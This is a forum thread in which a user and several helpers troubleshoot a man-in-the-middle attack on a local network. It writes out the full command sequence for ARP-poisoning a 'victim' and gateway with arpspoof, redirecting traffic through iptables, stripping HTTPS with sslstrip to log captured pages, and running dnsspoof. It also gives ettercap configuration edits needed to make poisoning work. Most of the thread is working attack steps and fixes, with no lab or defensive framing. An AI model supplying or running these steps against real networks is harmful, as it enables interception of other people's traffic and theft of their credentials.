problems with arpspoof, sslstrip, ettercap

[username324]

arpspoof and sslstrip

I used the directions at [Video+Tutorial] How to: Snifff SSL / HTTPS (sslstrip) - Remote Exploit Forums, with some changes. I didn't use ettercap, and I arpspoofed from victim to gateway and back again, but the directions only instruct me to arpspoof victim-gateway. Sometimes I'm re-directed to http, but most of the time I get the ssl page. But, I always see the ssl stripped when i point my mouse over links on the victim computer. I have an alfa g card, which I don't think is the problem. I've run the attack on two computers with the same problem. I've googled and come up with lots of complaints with no solutions. Anyone know what is wrong?

Ettercap
I've run ettercap on several computers and have only gotten it to work once. I can't poison. chk_poison always says "no poisoning at all" and occasionally "no poisoning between ip and ip". I edited etter.conf, so that's not the problem. Any other suggestions?

[halfdone]

Which commands you used? post here, its easyer to help if know what your doing. Check hak5.org episode 610 its a good guide.

[username324]

for arpspoof and sslstrip i use the following commands:

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
arpspoof -i wlan0 -t 192.168.1.110 192.168.1.254
arpspoof -i wlan0 -t 192.168.1.254 192.168.1.110
sslstrip.py -a -k -f --write /home/user/Desktop/output

sometimes the pages time-out. sometimes i can browse the web, but i get ssl pages. occasionally, i'm re-directed to http and i capture everything. it's hit or miss.

for ettercap i just use the GUI and get nowhere. no poisoning, ever.

[creepykrawler]

What kind of wireless card are you using? Do you know the chipset?
Also, you said you edited the etter.conf file, but what exactly did you edit?

[micole]

for ettercap i just use the GUI and get nowhere. no poisoning, ever.

I hate plugging my own stuff... But go here http://www.backtrack-linux.org/forum...poisoning.html and see if you edited your .conf file (like creepykrawler suggested).

[halfdone]

for arpspoof and sslstrip i use the following commands:

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
arpspoof -i wlan0 -t 192.168.1.110 192.168.1.254
arpspoof -i wlan0 -t 192.168.1.254 192.168.1.110
sslstrip.py -a -k -f --write /home/user/Desktop/output

You dont need to use .py in name of sslstrip. --write is too not needed, by default it creates sslstrip.log file to your desktop /root/
I did that sslstrip part like this

Code:

sslstrip -l 10000

and to read that file I did

Code:

more sslstrip.log

Its also nice to know which sites target goes.

Code:

dnsspoof

[username324]

I use an alfa AWUS036h. I edited etter.conf and uncommented iptables. halfdone, i tried your method with the same results.

halfdone,

i tried dnsspoof. I can see everything being forwarded through my computer, but like i said, the victim computer usually times out and only occasionally works. so, my computer isn't forwarding correctly. is that right? I think it may have to do with my iptables, but i don't mess with my rules other than the one rule to forward to port 10000.

And, why all tutorials mention arpspoofing from vitcim--> gateway? I've only gotten it to work doing both victim-->gateway and gateway-->victim.

[creepykrawler]

When using ettercap, also make sure you edit /etc/etter.conf the ec_uid and ec_gid line to both = 0 ( root )

[username324]

When using ettercap, also make sure you edit /etc/etter.conf the ec_uid and ec_gid line to both = 0 ( root )

did that too.

[username324]

ok, so i when i arp -a on the victim computer, the router's mac address remains the same, but the victim's ip changes to my mac. shouldn't both be my mac?